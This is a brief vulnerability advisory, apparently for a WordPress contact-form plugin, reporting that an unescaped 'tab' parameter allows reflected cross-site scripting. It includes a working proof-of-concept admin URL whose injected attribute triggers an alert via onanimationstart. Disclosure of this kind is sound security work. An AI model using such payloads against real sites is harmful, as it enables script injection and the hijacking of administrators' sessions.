The plugin does not escape the tab parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue
https://example.com/wp-admin/options-general.php?page=contactformx&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//